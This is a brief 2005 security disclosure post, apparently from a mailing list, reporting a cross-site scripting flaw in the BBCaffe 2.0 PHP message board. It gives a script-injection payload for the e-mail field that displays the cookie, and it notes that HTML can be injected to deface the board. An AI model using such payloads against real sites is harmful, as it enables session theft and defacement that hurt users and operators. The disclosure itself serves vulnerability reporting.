BBCaffe 2.0 cross site scripting poc

retrogod@xxxxxxxxxxxx · 18 Aug 2005 09:07:37 -0000

BBCaffe 2.0 cross site scripting poc

description: BBcaffe 2.0 is a fast, simple, easy and efficient bulletin board or message board program built in PHP/mySQL. Features include: posting, replying, deleting, editing, searching messages, sending notification email(s) , full templating. 

author site: http://www.developertutorials.com
download page: http://www.developertutorials.com/dtscripts/view.php?id=2576&vt=0

xss:

a user can submit a message, with an e-mail like this, ;) :

'><script>alert(document.cookie)</script>

or insert HTML code to deface board

rgod
site: http://rgod.altervista.org
email: retrogod@xxxxxxxxxxxxx